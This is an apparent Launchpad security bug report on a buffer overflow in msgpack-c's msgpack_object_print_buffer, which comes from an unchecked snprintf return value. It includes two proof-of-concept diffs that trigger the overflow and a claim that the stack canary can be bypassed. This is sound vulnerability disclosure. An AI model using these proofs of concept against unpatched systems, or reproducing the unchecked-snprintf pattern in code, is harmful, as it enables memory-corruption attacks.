buffer overflow in msgpack_object_print_buffer

Bug #1861448 reported by ddaa on 2020-01-30
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
msgpack-c (Ubuntu)
Undecided
Unassigned

Bug Description

`msgpack_object_print_buffer` didn't check the return value of `snprintf`, it will cause buffer overflow happened when printing an array (or a map) that contained multiple objects.

The official is fixed the problem in 3.2.1 version.
https://github.com/msgpack/msgpack-c/issues/774

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: libmsgpackc2 2.1.5-1
ProcVersionSignature: Ubuntu 4.15.0-55.60-generic 4.15.18
Uname: Linux 4.15.0-55-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.7
Architecture: amd64
Date: Thu Jan 30 18:54:19 2020
Dependencies:
 gcc-8-base 8.3.0-6ubuntu1~18.04.1
 libc6 2.27-3ubuntu1
 libgcc1 1:8.3.0-6ubuntu1~18.04.1
InstallationDate: Installed on 2018-01-11 (749 days ago)
InstallationMedia: Ubuntu-Server 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: msgpack-c
UpgradeStatus: Upgraded to bionic on 2019-06-05 (239 days ago)

ddaa (0xddaa) wrote :
ddaa (0xddaa) wrote :

Proof of concept:
(http://github.com/msgpack/msgpack-c)

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..041d8983 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);

ddaa (0xddaa) wrote :

Proof of concept 2:
stack canary check can be bypassed if the length of data is controllable.

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..75710638 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64+16);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64+16);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);

information type: Private Security → Public Security
Changed in msgpack-c (Ubuntu):
status: New → Confirmed
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers